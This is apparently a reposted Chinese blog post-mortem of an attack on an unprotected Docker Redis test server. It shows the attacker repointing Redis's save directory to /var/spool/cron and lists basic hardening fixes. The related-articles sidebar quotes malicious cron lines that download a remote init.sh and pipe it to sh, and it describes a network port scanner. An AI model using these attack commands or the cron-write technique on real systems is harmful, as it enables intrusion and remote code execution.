公司外网测试服务器 redis 被攻击复盘

最新推荐文章于 2022-07-24 22:27:24 发布
最新推荐文章于 2022-07-24 22:27:24 发布
阅读量149 收藏
点赞数
文章标签: 数据库 运维
原文链接:http://www.cnblogs.com/jackluo/p/10654118.html
版权

 最近 公司外网的测试的 redis 服务器被攻击,最开始是用 docker 搭建的 直接裸奔在外网,任何域名都可以通过 ip+6379来访问,最开始想的是测试服务器也没有啥,后面直接就被人登陆进去改了 redis 的密码,后面加强了一下,加了一个内网的访问地址

docker run --name redis -d \
  --volume /data/redis:/var/lib/redis \
  --publish 10.25.174.225:6379:6379 \
  jackluo/redis

这样只允许内网访问,但是好景不长,结果 又来了,至少他是咋 个进来的,我到目前还不清楚,但是

然后查了一下资料

果然发现 redis 数据 是被改了

127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "root"
127.0.0.1:6379> config get dir
1) "dir"
2) "/var/spool/cron"

redis 的 dir 默认值是/var/lib/redis

他把目录换了是想获取 root 的权限 ,还好不是用 root 启的 docker 服务,

查看了一下 docker 的redis日志错误

27154] 31 Mar 14:01:33.044 # Failed opening .rdb for saving: Permission denied
[1] 31 Mar 14:01:33.138 # Background saving error
[1] 31 Mar 14:01:39.065 * 10000 changes in 60 seconds. Saving...
[1] 31 Mar 14:01:39.067 * Background saving started by pid 27155
[27155] 31 Mar 14:01:39.107 # Failed opening .rdb for saving: Permission denied

发现从3.31号就开始攻击了

## 最后说一下如何修复吧

1.设置密码,

2.设计访问的 ip

3.采用普通用户启动redis  

转载于:https://www.cnblogs.com/jackluo/p/10654118.html

weixin_30730053
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记一次Redis攻击的解决方案
qq_35347200的博客
01-15 2995
记一次Redis攻击的解决方案 ​ 近期在开发小程序后台时,发现redis里面的key有时会莫名奇妙地消失,而且是离过期时间很远的key。本人首先是认为服务器内存不足,然后查看了一下服务器内存。 free -m 发现剩余80M,其实还是足够的。然后我就怀疑是不是redis设置了最大内存上限,首先打开redis的客户端,因为我是使用docker部署的redis,所以使用了一下命令 docker exec -it containerID redis-cli 选择数据库 使用下面的命令查看内存配置 in
docker容器封装redis,记一次挖矿病毒紧急处理
最新发布
lslym2010的博客
08-07 729
docker容器封装redis sys-processor-usage-monito
linux的redis病毒pscan,Docker的redis容器导致被挖矿病毒*kdevtmpfsi * 入侵, 干它
weixin_29218509的博客
05-14 547
以下内容全凭记忆。研发的一台docker创建了redis容器,直接设置无密访问导致被入侵。在母机上查询一下,其实第一个就可以了,第二个很多人搜索不到。[root@devtest tmp]# find / -name "*kdevtmpfsi*"/var/lib/docker/overlay2/0cf543cd0ddd70e9e68333057aefa1ca0c1864e5214630b4dd2f4...
内网扫描工具
09-25
#网络资产信息扫描 在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。 此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表 运行环境:python 2.6 + 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017) -m 指定线程数量 默认100线程 -t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 -n 不进行存活探测(ICMP)直接进行扫描。 结果报告保存在当前目录(扫描IP-时间戳.html)。 例子: python NAScan.py -h 10.111.1 python NAScan.py -h 192.168.1.1-192.168.2.111 python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6 python NAScan.py -h ip.ini -p port.ini -n 服务识别在server_info.ini文件中配置 格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220- 正则为空时则使用端口进行匹配,否则以正则匹配结果为准。 项目地址 https://github.com/ywolf/ 欢迎大家反馈建议和BUG
ROS软路由被外网攻击_网管如何解决
08-17
ROS软路由被外网攻击_网管如何解决;ROS软路由被外网攻击_网管如何解决!
redis外网安装
01-18
在无外网环境下安装Redis是一项常见的任务,尤其是在服务器或隔离网络中。Redis是一款高性能的键值存储系统,常用于数据库、缓存和消息中间件。本文将详细介绍在没有互联网连接的情况下如何顺利完成Redis的安装。 ...
arm服务器redis5.0.3
07-13
arm服务器redis5.0.3
Redis 性能测试
12-16
12. `-l`: 循环执行测试,直到被手动停止。 13. `-t`: 仅运行指定的测试命令列表,用逗号分隔。 14. `-I`: 开启空闲模式,只打开 N 个空闲连接并等待。 ### 实例应用 例如,我们可以这样设置多个参数来测试 Redis...
Redis服务器
09-29
Redis服务器是一种高性能、开源、基于键值对的数据存储系统,主要设计用于处理大量数据的快速读写操作。Redis支持多种数据结构,如字符串、哈希、列表、集合、有序集合等,这使得它在缓存、消息队列、计数器、会话...
miniredis:用于Go单元测试的Pure Go Redis服务器
02-04
Miniredis 纯Go Redis测试服务器,用于Go单元测试。 有时,您想测试使用Redis的代码,而不进行全面的集成测试。 Miniredis实现(部分)Redis服务器,以用于单元测试。 它使用真实的TCP接口实现了简单,廉价,内存中...
服务器(centos7)使用docker被病毒攻击,导致cpu100解决方案
weixin_43691942的博客
10-29 3074
#!/bin/bash openssl genrsa -aes256 -out ca-key.pem 4096 openssl req -new -x509 -days 3650 -key ca-key.pem -sha256 -out ca.pem openssl genrsa -out server-key.pem 4096 openssl req -sha256 -new -key server-key.pem -out server.csr openssl x509 -req -days 3650
Redis 也能被攻击?一次Redis被入侵的记录
探索云原生
12-05 5554
通过 RDB 方式入侵,Redis攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
验证docker的Redis镜像也存在未授权访问漏洞
12-04 249
看到了这篇老外的博客:Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities 于是,结合最近爆出的redis未授权访问导致可远程获得服务器权限漏洞,在docker容器中验证官方pull的镜像是否存在漏洞。 我的docker安装...
Redis如何通过公网访问
amy_xing01的博客
07-12 2427
redis的使用,正常场景中,应用与部署了DCS Redis缓存数据库服务器需要在同一个VPC内,而且必须配置相同的安全组规则,以便两者能正常通信。为了方便开发人员在本地搭建开发或测试环境,提高开发效率,华为云DCS提供了一个新功能,即通过公网连接Redis缓存实例。 这里需要提醒一点:通过公网访问可能会降低访问效率,所以对于生产环境,还是建议将应用与DCS Redis实例部署在同一个VPC内...
redis攻击笔记
半僧
12-31 3517
公司redis集群不断丢失数据,莫名进程不断涌起。经过几天排查,锁定redis攻击。很多使用者都是把redis下载到服务器直接运行使用,无ACL,无密码,root运行,且绑定在0.0.0.0:6379,暴露在公网。攻击者在未授权访问 Redis 的情况下通过redis的机制,可以将自己的公钥或者其他恶意程序写入目标服务器中,从而可以直接控制目标服务器。 下面还原攻击情况:寻找无验证的redis
Redis Docker容器安全性防护,防止入侵】
诗和远方,代码和你
07-24 1500
■ 需求背景 为团队构建测试环境缓存 ■ 实现步骤 Step. Docker Hub上找镜像: Step. Docker Hub上拉指定版本镜像: Step. 查看镜像: Step. 新建配置文件: Step. 创建脚本并运行 Step. 测试连接: Step. 测试监控:,键入 Step. 查看宿主机数据目录:,发现挂载成功Step.查看redis数据 + log + pid文件存储的默认目录dir:,结果若不是 /data,则设置一下: 备注 1)可以设置redis密码:,下次连接redis客户端,需经
redis查看远程连接与测试远程连接
热门推荐
h363659487的博客
01-08 1万+
修改redis最大连接数 可以在redis.conf配置文件中修改maxclients的参数; 或启动redis.service服务时加参数--maxclients 100000来设置最大连接数限制 redis-server --maxclients 100000 -f /etc/redis.conf命令行查看 redis最大连接数 127.0.0.1:6379> CONFIG
关于redis外网攻击
a13627210064的博客
06-09 609
总结记录一下,今天遇见的一个问题。 在测试服务器redis服务需要开通外网访问。 然后在开通外网访问之后没有限制访问ip(这里是大坑)。 然后被黑客给攻击了。 黑客通过redis运行命令插入了条wget命令,获取他自己写的sh脚本通过sbin/sh来运行他的脚本(copy数据库及一些关键的资料)。 查看了ip。195.3.146.118 特么还是代理的个国外的ip。 最后解决方案。 先关闭了redis的服务。然后先想着杀他的进程。 结果发现这小子循环执行wget一直在运行他的sh脚本。 然后做了一件蠢事-
服务器集体中毒事件 xmrig trace 挖矿病毒
枫小秋 的博客
01-05 6720
事件简述: 2019年12月22日,我们服务的一个客户服务器大面积提示被用于“挖矿”,随即我们便进行了病毒的清理,但病毒的来源通过我们原有实施的监控和安全检测中并未能发现。事前我们在服务器的远程登录上限制了只允许VPN+堡垒机登录,对服务器的各方面性能、所有人员的风险操作以及可能通过web渗透的异常登录和执行行为均有监控和告警,但这次在服务器监控和安全监控中我们却未找到任何端倪。 发生这次事件...
公司技术部教程:Redis服务器高级配置与自启动脚本
- 接着,脚本尝试启动Redis服务器,如果启动成功,则创建一个锁文件`/var/lock/subsys/redis`来标记服务正在运行。 4. **停止、重启与状态检查**: - `stop`函数通过`killproc`命令停止Redis服务,并删除相关锁...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值